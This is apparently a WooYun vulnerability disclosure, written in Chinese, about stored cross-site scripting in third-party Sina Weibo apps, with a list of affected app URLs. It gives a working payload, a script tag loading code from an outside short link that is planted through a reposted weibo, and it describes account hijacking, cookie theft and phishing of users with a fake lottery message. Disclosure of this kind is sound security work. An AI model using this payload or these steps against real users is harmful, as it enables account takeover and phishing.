WooYun.org

以前交过一个类似的问题，但是官方只是指那修哪。
这是随便找了几个应用测试：
如下都存在问题
http://batchhelper.sinaapp.com/
http://apps.weibo.com/guanjia
http://app.weibo.com/detail/62A7lB?ref=appsearch
http://app.weibo.com/detail/411VYf?ref=appsearch
http://app.weibo.com/detail/3MnIiu?ref=appsearch
http://app.weibo.com/detail/1iA37I?ref=appsearch
这两个第三方的可被劫持权限。（删除他所有的微博等等）
http://app.weibo.com/detail/62A7lB?ref=appsearch
http://app.weibo.com/detail/411VYf?ref=appsearch
原因：在批量删除的时候加载围脖，把过滤的全部转义回来了。不只是围脖，有些简介评论也有同样的问题。
利用方法：
（1）先让目标转发一个类似<script src=&#104;ttp://t.cn/Rhdd4Zp></script>的微博
（2）再让目标访问有问题的应用即可触发
虽然打到的cookie没用，但还是可以钓鱼什么的。
钓鱼过，消息是这么发的.庆祝sina应用xxxx，转发微博授权应用xxxxx可以抽奖什么。。。

演示basic认证钓鱼，还可以div。。跳转什么的